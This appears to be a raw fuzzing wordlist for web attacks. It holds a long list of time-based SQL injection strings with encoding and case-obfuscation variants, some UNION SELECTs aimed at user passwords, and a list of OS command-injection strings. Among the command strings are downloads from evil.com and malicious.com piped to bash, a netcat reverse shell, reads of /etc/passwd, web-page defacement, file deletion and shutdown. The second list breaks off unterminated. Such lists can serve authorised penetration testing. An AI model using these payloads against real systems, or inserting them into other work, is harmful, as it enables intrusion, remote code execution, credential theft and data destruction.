# SQL PAYLOADS
==========================================================================================

sql_payloads = [
    "' OR SLEEP(45) --",
"' OR SLEEP(45) --",
"' OR SLEEP(45) #",
"' OR SLEEP(45) /*",
"' OR SLEEP(45)\r--",
"' OR SLEEP(45)\n#",
"' OR SLEEP(45)\t/*",
"' OR SLEEP(45) AND '1'='1",
"' OR SLEEP(45) OR '1'='1",
"' OR SLEEP(45) AND '1'='1' --",
"' OR SLEEP(45) OR '1'='1' #",
"%27%20OR%20SLEEP%2845%29%20--",
"%27%20OR%20SLEEP%2845%29%20%23",
"%27%20OR%20SLEEP%2845%29%20%2F%2A",
"%27%20OR%20SLEEP%2845%29%5Cr%20--",
"%27%20OR%20SLEEP%2845%29%5Cn%20%23",
"%27%20OR%20SLEEP%2845%29%5Ct%20%2F%2A",
"%27%20OR%20SLEEP%2845%29%20AND%20%271%27%3D%271",
"%27%20OR%20SLEEP%2845%29%20OR%20%271%27%3D%271",
"%27%20OR%20SLEEP%2845%29%20AND%20%271%27%3D%271%20--",
"%27%20OR%20SLEEP%2845%29%20OR%20%271%27%3D%271%20%23",
"0x27 OR SLEEP(45) --",
"0x27 OR SLEEP(45) #",
"0x27 OR SLEEP(45) /*",
"0x27 OR SLEEP(45)\r--",
"0x27 OR SLEEP(45)\n#",
"0x27 OR SLEEP(45)\t/*",
"0x27 OR SLEEP(45) AND 0x31=0x31",
"0x27 OR SLEEP(45) OR 0x31=0x31",
"0x27 OR SLEEP(45) AND 0x31=0x31 --",
"0x27 OR SLEEP(45) OR 0x31=0x31 #",
"0b00100111 OR SLEEP(45) --",
"0b00100111 OR SLEEP(45) #",
"0b00100111 OR SLEEP(45) /*",
"0b00100111 OR SLEEP(45)\r--",
"0b00100111 OR SLEEP(45)\n#",
"0b00100111 OR SLEEP(45)\t/*",
"0b00100111 OR SLEEP(45) AND 0b00110001=0b00110001",
"0b00100111 OR SLEEP(45) OR 0b00110001=0b00110001",
"0b00100111 OR SLEEP(45) AND 0b00110001=0b00110001 --",
"0b00100111 OR SLEEP(45) OR 0b00110001=0b00110001 #",
"' OR SLEEP(45) /*' OR '1'='1",
"' OR SLEEP(45) /*' OR '1'='1' --",
"' OR SLEEP(45) /*' OR '1'='1' #",
"' OR SLEEP(45) /*' OR '1'='1' /*",
"' OR SLEEP(45)\r/*' OR '1'='1",
"' OR SLEEP(45)\n/*' OR '1'='1",
"' OR SLEEP(45)\t/*' OR '1'='1",
"%27%20OR%20SLEEP%2845%29%20%2F%2A%27%20OR%20%271%27%3D%271",
"%27%20OR%20SLEEP%2845%29%20%2F%2A%27%20OR%20%271%27%3D%271%20--",
"%27%20OR%20SLEEP%2845%29%20%2F%2A%27%20OR%20%271%27%3D%271%20%23",
"%27%20OR%20SLEEP%2845%29%20%2F%2A%27%20OR%20%271%27%3D%271%20%2F%2A",
"%27%20OR%20SLEEP%2845%29%5Cr%20%2F%2A%27%20OR%20%271%27%3D%271",
"%27%20OR%20SLEEP%2845%29%5Cn%20%2F%2A%27%20OR%20%271%27%3D%271",
"%27%20OR%20SLEEP%2845%29%5Ct%20%2F%2A%27%20OR%20%271%27%3D%271",
"0x27 OR SLEEP(45) /*' OR 0x31=0x31",
"0x27 OR SLEEP(45) /*' OR 0x31=0x31 --",
"0x27 OR SLEEP(45) /*' OR 0x31=0x31 #",
"0x27 OR SLEEP(45) /*' OR 0x31=0x31 /*",
"0x27 OR SLEEP(45)\r/*' OR 0x31=0x31",
"0x27 OR SLEEP(45)\n/*' OR 0x31=0x31",
"0x27 OR SLEEP(45)\t/*' OR 0x31=0x31",
 "' OR SLEEP(45) --",
    "' OR SLEEP(45) #",
    "' OR SLEEP(45) /*",
    "' OR SLEEP(45)\r--",
    "' OR SLEEP(45)\n#",
    "' OR SLEEP(45)\t/*",
    "' OR SLEEP(45) AND '1'='1'",
    "' OR SLEEP(45) OR '1'='1'",
    "' OR SLEEP(45) AND '1'='1' --",
    "' OR SLEEP(45) OR '1'='1' #",
    "%27%20OR%20SLEEP%2845%29%20--",
    "%27%20OR%20SLEEP%2845%29%20%23",
    "%27%20OR%20SLEEP%2845%29%20%2F%2A",
    "%27%20OR%20SLEEP%2845%29%5Cr%20--",
    "%27%20OR%20SLEEP%2845%29%5Cn%20%23",
    "%27%20OR%20SLEEP%2845%29%5Ct%20%2F%2A",
    "' OR (SELECT 1 UNION SELECT SLEEP(45)) --",
    "' OR (SELECT 1 UNION SELECT SLEEP(45)) #",
    "' OR (SELECT 1 UNION SELECT SLEEP(45)) /*",
    "' OR (SELECT 1 UNION SELECT SLEEP(45)) \r--",
    "' OR (SELECT 1 UNION SELECT SLEEP(45)) \n#",
    "' OR (SELECT 1 UNION SELECT SLEEP(45)) \t/*",
    "' OR (SELECT 1 UNION SELECT SLEEP(45) AND '1'='1') --",
    "' OR (SELECT 1 UNION SELECT SLEEP(45) AND '1'='1') #",
    "' OR (SELECT 1 UNION SELECT SLEEP(45) AND '1'='1') --",
    "0x27 OR SLEEP(45) --",
    "0x27 OR SLEEP(45) #",
    "0x27 OR SLEEP(45) /*",
    "0x27 OR SLEEP(45)\r--",
    "0x27 OR SLEEP(45)\n#",
    "0x27 OR SLEEP(45)\t/*",
    "0x27 OR SLEEP(45) AND 0x31=0x31",
    "0x27 OR SLEEP(45) OR 0x31=0x31",
    "0x27 OR SLEEP(45) AND 0x31=0x31 --",
    "0x27 OR SLEEP(45) OR 0x31=0x31 #",
    "0b00100111 OR SLEEP(45) --",
    "0b00100111 OR SLEEP(45) #",
    "0b00100111 OR SLEEP(45) /*",
    "0b00100111 OR SLEEP(45)\r--",
    "0b00100111 OR SLEEP(45)\n#",
    "0b00100111 OR SLEEP(45)\t/*",
    "0b00100111 OR SLEEP(45) AND 0b00110001=0b00110001",
    "0b00100111 OR SLEEP(45) OR 0b00110001=0b00110001",
    "0b00100111 OR SLEEP(45) AND 0b00110001=0b00110001 --",
    "0b00100111 OR SLEEP(45) OR 0b00110001=0b00110001 #",
    "' OR SLEEP(45) /*' OR '1'='1",
    "' OR SLEEP(45) /*' OR '1'='1' --",
    "' OR SLEEP(45) /*' OR '1'='1' #",
    "' OR SLEEP(45) /*' OR '1'='1' /*",
    "' OR SLEEP(45)\r/*' OR '1'='1",
    "' OR SLEEP(45)\n/*' OR '1'='1",
    "' OR SLEEP(45)\t/*' OR '1'='1",
    "%27%20OR%20SLEEP%2845%29%20%2F%2A%27%20OR%20%271%27%3D%271",
    "%27%20OR%20SLEEP%2845%29%20%2F%2A%27%20OR%20%271%27%3D%271%20--",
    "%27%20OR%20SLEEP%2845%29%20%2F%2A%27%20OR%20%271%27%3D%271%20%23",
    "%27%20OR%20SLEEP%2845%29%20%2F%2A%27%20OR%20%271%27%3D%271%20%2F%2A",
    "%27%20OR%20SLEEP%2845%29%5Cr%20%2F%2A%27%20OR%20%271%27%3D%271",
    "%27%20OR%20SLEEP%2845%29%5Cn%20%2F%2A%27%20OR%20%271%27%3D%271",
    "%27%20OR%20SLEEP%2845%29%5Ct%20%2F%2A%27%20OR%20%271%27%3D%271",
    "0x27 OR SLEEP(45) /*' OR 0x31=0x31",
    "0x27 OR SLEEP(45) /*' OR 0x31=0x31 --",
    "0x27 OR SLEEP(45) /*' OR 0x31=0x31 #",
    "0x27 OR SLEEP(45) /*' OR 0x31=0x31 /*",
    "0x27 OR SLEEP(45)\r/*' OR 0x31=0x31",
    "0x27 OR SLEEP(45)\n/*' OR 0x31=0x31",
    "0x27 OR SLEEP(45)\t/*' OR 0x31=0x31",
    "0b00100111 OR SLEEP(45) /*' OR 0b00110001=0b00110001",
    ") OR SLEEP(45) --",
    ") OR SLEEP(45) #",
    ") OR SLEEP(45) /*",
    ") OR SLEEP(45)\r--",
    ") OR SLEEP(45)\n#",
    ") OR SLEEP(45)\t/*",
    ") OR SLEEP(45) AND '1'='1'",
    ") OR SLEEP(45) OR '1'='1'",
    ") OR SLEEP(45) AND '1'='1' --",
    ") OR SLEEP(45) OR '1'='1' #",
    ") OR (SELECT 1 UNION SELECT SLEEP(45)) --",
    ") OR (SELECT 1 UNION SELECT SLEEP(45)) #",
    ") OR (SELECT 1 UNION SELECT SLEEP(45)) /*",
    ") OR (SELECT 1 UNION SELECT SLEEP(45)) \r--",
    ") OR (SELECT 1 UNION SELECT SLEEP(45)) \n#",
    ") OR (SELECT 1 UNION SELECT SLEEP(45)) \t/*",
    ") OR (SELECT 1 UNION SELECT SLEEP(45) AND '1'='1') --",
    ") OR (SELECT 1 UNION SELECT SLEEP(45) AND '1'='1') #",
    ") OR (SELECT 1 UNION SELECT SLEEP(45) AND '1'='1') --",
    "0x29 OR SLEEP(45) --",
    "0x29 OR SLEEP(45) #",
    "0x29 OR SLEEP(45) /*",
    "0x29 OR SLEEP(45)\r--",
    "0x29 OR SLEEP(45)\n#",
    "0x29 OR SLEEP(45)\t/*",
    "0x29 OR SLEEP(45) AND 0x31=0x31",
    "0x29 OR SLEEP(45) OR 0x31=0x31",
    "0x29 OR SLEEP(45) AND 0x31=0x31 --",
    "0x29 OR SLEEP(45) OR 0x31=0x31 #",
    "0b00111001 OR SLEEP(45) --",
    "0b00111001 OR SLEEP(45) #",
    "0b00111001 OR SLEEP(45) /*",
    "0b00111001 OR SLEEP(45)\r--",
    "0b00111001 OR SLEEP(45)\n#",
    "0b00111001 OR SLEEP(45)\t/*",
    "0b00111001 OR SLEEP(45) AND 0b00110001=0b00110001",
    "0b00111001 OR SLEEP(45) OR 0b00110001=0b00110001",
    "0b00111001 OR SLEEP(45) AND 0b00110001=0b00110001 --",
    "0b00111001 OR SLEEP(45) OR 0b00110001=0b00110001 #",
    ") OR SLEEP(45) /*' OR '1'='1",
    ") OR SLEEP(45) /*' OR '1'='1' --",
    ") OR SLEEP(45) /*' OR '1'='1' #",
    ") OR SLEEP(45) /*' OR '1'='1' /*",
    ") OR SLEEP(45)\r/*' OR '1'='1",
    ") OR SLEEP(45)\n/*' OR '1'='1",
    ") OR SLEEP(45)\t/*' OR '1'='1",
    "%29%20OR%20SLEEP%2845%29%20--",
    "%29%20OR%20SLEEP%2845%29%20%23",
    "%29%20OR%20SLEEP%2845%29%20%2F%2A",
    "%29%20OR%20SLEEP%2845%29%5Cr%20--",
    "%29%20OR%20SLEEP%2845%29%5Cn%20%23",
    "%29%20OR%20SLEEP%2845%29%5Ct%20%2F%2A",
    "0x29 OR SLEEP(45) /*' OR 0x31=0x31",
    "0x29 OR SLEEP(45) /*' OR 0x31=0x31 --",
    "0x29 OR SLEEP(45) /*' OR 0x31=0x31 #",
"0b00111001 OR SlEeP(45) --",
"0b00111001 Or SLeEp(45) #",
"0b00111001 Or SLEEp(45) /*",
"0b00111001 Or SLeEp(45) aND 0b00110001=0b00110001 --",
"0b00111001 or sleEp(45) OR 0b00110001=0b00110001 #",
"0b00111001 Or sLEEP(45) AND 0b00110001=0b00110001 /*",
"0b00111001 Or SleEp(45) OR 0b00110001=0b00110001 --",
"0b00111001 Or SleEp(45) AND 0b00110001=0b00110001 #",
"0b00111001 Or sLeEp(45) AND 0b00110001=0b00110001 --",
"0b00111001 Or slEeP(45) AND 0b00110001=0b00110001 #",
"0b00111001 Or sLEEp(45) -- 0b00110001",
"0b00111001 Or sLEEP(45) -- 0b00110001 #",
"0b00111001 Or slEep(45) -- 0b00110001 /*",
"0b00111001 Or sleEp(45) AND 0b00110001=0b00110001 #",
"0b00111001 Or sLEEP(45) AND 0b00110001=0b00110001 /*",

"0b00100111 OR SLEEP(45) /*' OR 0b00110001=0b00110001",
"0b00100111 OR SLEEP(45) /*' OR 0b00110001=0b00110001 --",
"0b00100111 OR SLEEP(45) /*' OR 0b00110001=0b00110001 #",
"0b00100111 OR SLEEP(45) /*' OR 0b00110001=0b00110001 /*",
"0b00100111 OR SLeEP(45)\r/*' OR 0b00110001=0b00110001",
"0b00100111 OR SlEEP(45)\n/*' OR 0b00110001=0b00110001",
"0b00100111 OR SLEEp(45)\t/*' OR 0b00110001=0b00110001",
"' OR SLEEP(45) AND 'x'='x",
"' OR SLEEP(45) OR 'x'='x",
"' OR SLEEP(45) AND 'x'='x' --",
"' OR SLEEP(45) OR 'x'='x' #",
"0x29 OR SlEeP(45) --",
"0x29 OR SLeEp(45) #",
"0x29 OR SLEEp(45) /*",
"0x29 OR SlEeP(45) AND 0x31=0x31 --",
"0x29 OR sLEEp(45) OR 0x31=0x31 #",
"0x29 OR sleEp(45) AND 0x31=0x31 /*",
"0x29 OR sLeEp(45) -- 0x31",
"0x29 OR SlEeP(45) -- 0x31 #",
"0x29 OR sLeEp(45) -- 0x31 /*",
"0x29 OR sLEEp(45) AND 0x31=0x31 --",
"0x29 OR SlEeP(45) OR 0x31=0x31 #",
"0x29 OR SLEEp(45) AND 0x31=0x31 /*",
"0x29 OR slEeP(45) AND 0x31=0x31 #",
"0x29 OR SlEeP(45) AND 0x31=0x31 --",
"0x29 OR SLEEp(45) /* 0x31",
"sLEEP(45) --",
"sLeEp(45) #",
"sLEEP(45) /*",
"SLEEP(45) aND 1=1 --",
"SLEEp(45) OR 1=1 #",
"SlEeP(45) AND 1=1 /*",
"sLEEP(45) OR 1=1 --",
"SlEeP(45) -- 1=1",
"SLEEP(45) -- 1=1 #",
"SLeeP(45) -- 1=1 /*",
"sLEEP(45) aND 1=1 --",
"SLEEp(45) OR 1=1 #",
"SLEEP(45) aND 1=1 /*",
"SLEEP(45) -- 0=0",
"SLeeP(45) OR 0=0 #",
"SLEEP (45) \r--",
"SlEeP (45) \r#",
"SLEEP (45) \r/*",
"SLEEP (45) \n--",
"SlEeP (45) \n#",
"SLEEP (45) \n/*",
"SLEEP (45) \r\n--",
"SLeEp (45) \r\n#",
"SLEEP (45) \r\n/*",
"SLEEp (45) \r--",
"SlEeP (45) \n--",
"SLEEP (45) \t--",
"SLEEp (45) \t#",
"SLEEP (45) \t/*",
"SlEeP (45) \t--",
"UNiOn SeLeCt nAmE, pAsSwOrD FrOm uSeRs \rWhErE 1=1 AnD sLeEp(45) --",
"UNiOn SeLeCt cOl1, cOl2 FrOm taBlE1 \rWhErE 1=1 AnD SlEeP(45) --",
"UNiOn SeLeCt tAbLe_nAmE FrOm inFo \nWhErE 1=1 AnD SlEeP(45) #",
"UNiOn SeLeCt dAtAbAsE() \r\nWhErE 1=1 AnD SlEeP(45) --",
"UNiOn SeLeCt aCtIvItY, bUsEr, sTaTuS FrOm UsEr_StAtUs \nWhErE 1=1 AnD SlEeP(45) --",
"UNiOn SeLeCt mAiN, pAsSwOrD FrOm sEcUrItY \nWhErE 1=1 AnD SlEeP(45) --",
"UNiOn SeLeCt dAtA, iD FrOm uSeR \tWhErE 1=1 AnD SlEeP(45) --",
"UNiOn SeLeCt cOdE, pROfIlE \tFrOm uSeR_DET \rWhErE 1=1 AnD SlEeP(45) #",
"UNiOn SeLeCt uSeR, tYpE FrOm pArAmEtErS \nWhErE 1=1 AnD SlEeP(45) --",
"UNiOn SeLeCt uSeR_id, tYpE, aCtIvItY FrOm dAtA_FiLe \nWhErE 1=1 AnD SlEeP(45) --",
"UNiOn SeLeCt mEmBeR, aCtIvItY FrOm fOrUm \rWhErE 1=1 AnD SlEeP(45) --",
"UNiOn SeLeCt dAtA, iD FrOm hIsToRy \nWhErE 1=1 AnD SlEeP(45) --",
"UNiOn SeLeCt NaMe, pRofile \rWhErE 1=1 AnD SlEeP(45) --",
"UNiOn SeLeCt pRoFiLe, tImE FrOm dAtA \nWhErE 1=1 AnD SlEeP(45) --",
"UNiOn SeLeCt cOl1, cOl2, cOl3 FrOm taBlE1 \rWhErE 1=1 AnD SlEeP(45) --",
") oR sLeEp(45) --",
") oR sLeEp(45) #",
"; oR sLeEp(45) --",
"; oR sLeEp(45) #",
") oR sLeEp(45) \n--",
") oR sLeEp(45) \r--",
"; oR sLeEp(45) \n#",
"; oR sLeEp(45) \r#",
") oR sLeEp(45) -- -",
") oR sLeEp(45) # -",
") oR sLeEp(45) \t--",
") oR sLeEp(45) \t#",
"; oR sLeEp(45) -- -",
"; oR sLeEp(45) \n--",
"; oR sLeEp(45) \r#",

"%27%20OR%20SLEEP%2845%29%20AND%20%27x%27%3D%27x",
"%27%20OR%20SLEEP%2845%29%20OR%20%27x%27%3D%27x",
"%27%20OR%20SLEEP%2845%29%20AND%20%27x%27%3D%27x%20--",
"%27%20OR%20SLEEP%2845%29%20OR%20%27x%27%3D%27x%20%23",
"0x27 OR SLEEP(45) AND 0x78=0x78",
"0x27 OR SLEEP(45) OR 0x78=0x78",
"0x27 OR SLEEP(45) AND 0x78=0x78 --",
"0x27 OR SLEEP(45) OR 0x78=0x78 #",
"0b00100111 OR SLEEP(45) AND 0b01111000=0b01111000",
"0b00100111 OR SLEEP(45) OR 0b01111000=0b01111000",
"0b00100111 OR SLEEP(45) AND 0b01111000=0b01111000 --",
"0b00100111 OR SLEEP(45) OR 0b01111000=0b01111000 #",
"' OR SLEEP(45) AND 'y'='y",
"' OR SLEEP(45) OR 'y'='y",
"' OR SLEEP(45) AND 'y'='y' --",
"' OR SLEEP(45) OR 'y'='y' #",
"%27%20OR%20SLEEP%2845%29%20AND%20%27y%27%3D%27y",
"%27%20OR%20SLEEP%2845%29%20OR%20%27y%27%3D%27y",
"%27%20OR%20SLEEP%2845%29%20AND%20%27y%27%3D%27y%20--",
"%27%20OR%20SLEEP%2845%29%20OR%20%27y%27%3D%27y%20%23",
"0x27 OR SLEEP(45) AND 0x79=0x79",
"0x27 OR SLEEP(45) OR 0x79=0x79",
"0x27 OR SLEEP(45) AND 0x79=0x79 --",
"0x27 OR SLEEP(45) OR 0x79=0x79 #",
"0b00100111 OR SLEEP(45) AND 0b01111001=0b01111001",
"0b00100111 OR SLEEP(45) OR 0b01111001=0b01111001",
"0b00100111 OR SLEEP(45) AND 0b01111001=0b01111001 --",
"0b00100111 OR SLEEP(45) OR 0b01111001=0b01111001 #",
"' OR SLEEP(45) AND 'z'='z",
"' OR SLEEP(45) OR 'z'='z",
"' OR SLEEP(45) AND 'z'='z' --",
"' OR SLEEP(45) OR 'z'='z' #",
"%27%20OR%20SLEEP%2845%29%20AND%20%27z%27%3D%27z",
"%27%20OR%20SLEEP%2845%29%20OR%20%27z%27%3D%27z",
"%27%20OR%20SLEEP%2845%29%20AND%20%27z%27%3D%27z%20--",
"%27%20OR%20SLEEP%2845%29%20OR%20%27z%27%3D%27z%20%23",
"0x27 OR SLEEP(45) AND 0x7A=0x7A",
"0x27 OR SLEEP(45) OR 0x7A=0x7A",
"0x27 OR SLEEP(45) AND 0x7A=0x7A --",
"0x27 OR SLEEP(45) OR 0x7A=0x7A #",
"0b00100111 OR SLEEP(45) AND 0b01111010=0b01111010",
"0b00100111 OR SLEEP(45) OR 0b01111010=0b01111010",
"0b00100111 OR SLEEP(45) AND 0b01111010=0b01111010 --",
"0b00100111 OR SLEEP(45) OR 0b01111010=0b01111010 #",
"' OR SLEEP(45) AND 'a'='a",
"' OR SLEEP(45) OR 'a'='a",
"' OR SLEEP(45) AND 'a'='a' --",
"' OR SLEEP(45) OR 'a'='a' #"

]


# OS PAYLOADS
===================================================================================================

os_payloads = [
    "ping -c 4 127.0.0.1",
    "echo 'test' > /tmp/test.txt",
    "ls",
    "id",
    "sleep 45",
    "sLeEp 45",
    "sle\ep 45",
    "slee%70 45",
    "sle%65p 45",
    "$(sleep 45)",
    "sleep 4$((5-0))",
    "sleep 4$(echo 5)",
    "sleep $((30+15))",
    "slee\x70 45",
    "slee\u0070 45",
    "slee%0Ap 45",
    "slee%0Dp 45",
    "slee%09p 45",
    "slee%20p 45",
    "sleep%20%34%35",
    "sleep${IFS}45",
    "sleep%20%34%35",
    "sl%65%65p 45",
    "sleep%09%34%35",
    "sleep%0A45",
    "sleep%0D45",
    "sleep%20%34%35",
    "sleep%2f%2f45",
    "sleep%23%2045",
    "sleep%0A%20%34%35",
    "sleep%0D%20%34%35",
    "sleep%20%34%35%20",
   
   "; $(SLEEP 45) #",
"; | SLEEP 45 #",
"; `SLEEP 45` #", 
    "; $(ping -c 1 127.0.0.1; SLEEP 45) #", 
    "; | ping -c 1 127.0.0.1; SLEEP 45 #", 
    "; `ping -c 1 127.0.0.1; SLEEP 45` #", 
    "; $(whoami; SLEEP 45) #", 
    "; | whoami; SLEEP 45 #", 
    "; `whoami; SLEEP 45` #", 
    "; $(ls; SLEEP 45) #", 
    "; | ls; SLEEP 45 #", 
    "; `ls; SLEEP 45` #", 
    "; $(cat /etc/passwd; SLEEP 45) #", 
    "; | cat /etc/passwd; SLEEP 45 #", 
    "; `cat /etc/passwd; SLEEP 45` #", 
    "; $(wget http://evil.com/malware.sh -O /tmp/malware.sh; SLEEP 45) #", 
    "; | wget http://evil.com/malware.sh -O /tmp/malware.sh; SLEEP 45 #", 
    "; `wget http://evil.com/malware.sh -O /tmp/malware.sh; SLEEP 45` #", 
    "; $(curl -s http://evil.com/malware.sh -o /tmp/malware.sh; SLEEP 45) #", 
    "; | curl -s http://evil.com/malware.sh -o /tmp/malware.sh; SLEEP 45 #", 
    "; `curl -s http://evil.com/malware.sh -o /tmp/malware.sh; SLEEP 45` #", 
     "1; sleep 45",
    "1 && sleep 45",
    "1 || sleep 45",
    "1; (sleep 45)",
    "1 | sleep 45",
    "1; sleep 45; whoami",
    "1%3B%20sleep%2045",  # URL encoded
    "1%3B%20%73%6C%65%65%70%20%34%35",  # Hexadecimal encoded
    "1; sleep 45 > /tmp/sleep.log",  # Redirect output
    "1; sleep 45 && touch /tmp/chain_success",  # File creation
    "1; sleep 45 & echo done",  # Run in background
    "1; sleep $((0x2D))",  # Hexadecimal time
    "1; $(sleep 45)",  # Command substitution
    "1; `sleep 45`",  # Backtick execution
    "1; sleep 4$((1+4))",  # Arithmetic expansion
    "1; sleep 4$(echo 5)",  # Inline evaluation
    "1 | sh -c 'sleep 45'",  # Pipe to shell
    "1; bash -c 'sleep 45'",  # Run in Bash shell
    "1 | /bin/bash -c sleep 45",  # Explicit shell path
    "1; printf 'sleep 45' | bash",  # Use printf
    "1; sleep 4$(echo 5 | tr -d '\\n')",  # Remove newline
    "1; : $(sleep 45)",  # Null command with sleep
    "1; true && sleep 45",  # Always true logic
    "1; false || sleep 45",  # Always false logic
    "1; export PATH=/bin; sleep 45",  # PATH modification
    "1; sleep `expr 44 + 1`",  # Use expr for math
    "1; sleep 0x2D",  # Hexadecimal input
    "1 | sleep 45 || sleep 10",  # Fallback chaining
    "1; echo test && sleep 45 || echo fail",  # Conditional chaining
    "1; sleep $((45/1))",  # Simple math
    "1; sleep $((20+25))",  # Addition math
    "1 | sleep 45; ls",  # Follow with `ls`
    "1; (sleep 45; echo done)",  # Subshell with sleep
    "1; sleep 45; ps aux",  # Run with process status
    "1; nohup sleep 45 &",  # Background task
    "1; sleep 45 | logger",  # Send to syslog
    "1; echo 'sleep 45' | bash",  # Echo pipe to shell
    "1 | sleep 45 && ls",  # Conditional list
    "1; { sleep 45; }",  # Group command
    "1; exec sleep 45",  # Use exec
    "1; sleep `echo 45`",  # Echo substitution
    "1; timeout 46 sleep 45",  # Timeout command
    "1; sleep 45 || reboot",  # Sleep or reboot
    "1 | /bin/sh -c sleep 45",  # Explicit shell
    "1; sleep 0$((45))",  # Prefixed zero
    "%3B%20%24%28SLEEP%2045%29%20%23", 
    "%3B%20%7C%20SLEEP%2045%20%23", 
    "%3B%20%60SLEEP%2045%60%20%23", 
    "%3B%20%24%28ping%20-c%201%20127.0.0.1%3B%20SLEEP%2045%29%20%23", 
    "%3B%20%7C%20ping%20-c%201%20127.0.0.1%3B%20SLEEP%2045%20%23", 
    "%3B%20%60ping%20-c%201%20127.0.0.1%3B%20SLEEP%2045%60%20%23", 
    "%3B%20%24%28whoami%3B%20SLEEP%2045%29%20%23",
    ") ; sLeEp 45; cat /etc/passwd --",
    "1; sLeEP 45",
    "1; SleEp 45",
    "1; SLEeP 45\r",
    "1; slEep 45\n",
    "1; slEEp 45\r\n",
    "1; SLEEP 45 && EcHO Done",
    "1; SLEEp 45 || eCho fail",
    "1; `sLeEp 45`",
    "1; $(sLeeP 45)",
    "1 && sLeEp 45",
    "1 || SLeeP 45",
    "1; sLEEp 45 > /tmp/log",
    "1; sLeeP 45 && ToUCH /tmp/success",
    "1; sleep 45\r; eCHo Finished",
    "1; sLeEP 45 | tEE /tmp/result",
    "1%3B%20slEeP%2045",
    "1%20%26%26%20sLEep%2045",
    "1%3B%0AsLEEp%2045",
    "1%3B%0DsLEEp%2045",
    "1%3B%20sLEE\rp%2045",
    "1; SLEEP 45\r&& EchO Success",
    "1; slEeP 45\n&& TouCH /tmp/marker",
    "1; `SLeeP 45`\r&& ECho Hello",
    "1; $(SlEEp 45)\n",
    "1; exeC slEEp 45\r",
    "1; SLEE\rP 45 && ToUcH /tmp/chain",
    "1; sLeEP 45 > /tmp/LoG && eCHo done",
    "1; sleEP 45 | eCHo chain\r",
    "1; sleEP 45\r && Echo NeWline",
    "1; SLeeP 45\r\n| Touch /tmp/success",
") ; sLeEp 45; id --",
") ; sLeEp 45; uname -a --",
") ; sLeEp 45; whoami --",
") ; sLeEp 45; cat /proc/version --",
") ; sLeEp 45; ps aux | grep apache2 --",
") ; sLeEp 45; ls -la /home --",
") ; sLeEp 45; echo 'Injected' > /tmp/injected.txt --",
") ; sLeEp 45; curl http://malicious.com/payload.sh | bash --",
") ; sLeEp 45; wget http://malicious.com/malware.sh -O /tmp/malware.sh && chmod +x /tmp/malware.sh && /tmp/malware.sh --",
") ; sLeEp 45; ping -c 4 127.0.0.1 --",
") ; sLeEp 45; nc -e /bin/sh 10.0.0.1 1234 --",
") ; sLeEp 45; echo 'malicious code' >> /var/www/html/malicious_code.html --",
") ; sLeEp 45; rm -rf /tmp/* --",
") ; sLeEp 45; shutdown -h now --",

    "%3B%20%7C%20whoami%3B%20SLEEP%2045%20%23", 
    "%3B%20%60whoami%3B%20SLEEP%2045%60%20%23", 
    "%3B%20%24%28ls%3B%20SLEEP%2045%29%20%23", 
    "%3B%20%7C%20ls%3B%20SLEEP%2045%20%23", 
    "%3B%20%60ls%3B%20SLEEP%2045%60%20%23", 
    "%3B%20%24%28cat%20%2Fetc%2Fpasswd%3B%20SLEEP%2045%29%20%23", 
    "%3B%20%7C%20cat%20%2Fetc%2Fpasswd%3B%20SLEEP%2045%20%23", 
    "%3B%20%60cat%20%2Fetc%2Fpasswd%3B%20SLEEP%2045%60%20%23", 
    "%3B%20%24%28wget%20http%3A%2F%2Fevil.com%2Fmalware.sh%20-O%20%2Ftmp%2Fmalware.sh%3B%20SLEEP%2045%29%20%23", 
    "%3B%20%7C%20wget%20http%3A%2F%2Fevil.com%2Fmalware.sh%20-O%20%2Ftmp%2Fmalware.sh%3B%20SLEEP%2045%20%23", 
    "%3B%20%60wget%20http%3A%2F%2Fevil.com%2Fmalware.sh%20-O%20%2Ftmp%2Fmalware.sh%3B%20SLEEP%2045%60%20%23", 
    "%3B%20%24%28curl%20-s%20http%3A%2F%2Fevil.com%2Fmalware.sh%20-o%20%2Ftmp%2Fmalware.sh%3B%20SLEEP%2045%29%20%23", 
    "%3B%20%7C%20curl%20-s%20http%3A%2F%2Fevil.com%2Fmalware.sh%20-o%20%2Ftmp%2Fmalware.sh%3B%20SLEEP%2045%20%23", 
    "%3B%20%60curl%20-s%20http%3A%2F%2Fevil.com%2Fmalware.sh%20-o%20%2Ftmp%2Fmalware.sh%3B%20SLEEP%2045%60%20%23",

    "sleep%20%34%35%20%23",
    "sleep%20%34%35%20%2F%2F",
    "sleep%20%34%35%20%0A",
    "sleep%20%34%35%20%0D",
    "sleep%20%34%35%20&&%20echo",
    "sleep%20%34%35%20||%20echo",
    "sleep%20%34%35%20;%20echo",
    "sleep%20%34%35%20|%20echo",
    "sleep%20%34%35%20%26%26%20echo",
    "sleep%20%34%35%20%7C%7C%20echo",
    "sleep%20%34%35%20%3B%20echo",
    "sleep%20%34%35%20%7C%20echo",
    "sleep%20%34%35%20%26%26%20echo%20done",
    "sleep%20%34%35%20%7C%7C%20echo%20done",
    "sleep%20%34%35%20%3B%20echo%20done",
    "sleep%20%34%35%20%7C%20echo%20done",
    "sleep%20%34%35%20%26%26%20echo%20finished",
    "sleep%20%34%35%20%7C%7C%20echo%20finished",
    "sleep%20%34%35%20%3B%20echo%20finished",
    "sleep%20%34%35%20%7C%20echo%20finished",
    "sleep%20%34%35%20%26%26%20echo%20complete",
    "sleep%20%34%35%20%7C%7C%20echo%20complete",
    "sleep%20%34%35%20%3B%20echo%20complete",
    "sleep%20%34%35%20%7C%20echo%20complete",
    "sleep%20%34%35%20%26%26%20echo%20done",
    "sleep%20%34%35%20%7C%7C%20echo%20done",
    "sleep%20%34%35%20%3B%20echo%20done",
    "sleep%20%34%35%20%7C%20echo%20done",
    "sleep%20%34%35%20%26%26%20echo%20finished",
    "sleep%20%34%35%20%7C%7C%20echo%20finished",
    "sleep%20%34%35%20%3B%20echo%20finished",
    "sleep%20%34%35%20%7C%20echo%20finished",
    "sleep%20%34%35%20%26%26%20echo%20complete",
    "sleep%20%34%35%20%7C%7C%20echo%20complete",
    "sleep%20%34%35%20%3B%20echo%20complete",
    "sleep%20%34%35%20%7C%20echo%20complete",
    "sleep%20%34%35%20%26%26%20echo%20done",
    "sleep%20%34%35%20%7C%7C%20echo%20done",
    "sleep%20%34%35%20%3B%20echo%20done",
    "sleep%20%34%35%20%7C%20echo%20done",
    "sleep%20%34%35%20%26%26%20echo%20finished",
    "sleep%20%34%35%20%7C%7C%20echo%20finished",
    "sleep%20%34%35%20%3B%20echo%20finished",
    "sleep%20%34%35%20%7C%20echo%20finished",
    "sleep%20%34%35%20%26%26%20echo%20complete",
    "sleep%20%34%35%20%7C%7C%20echo%20complete",
    "sleep%20%34%35%20%3B%20echo%20complete",
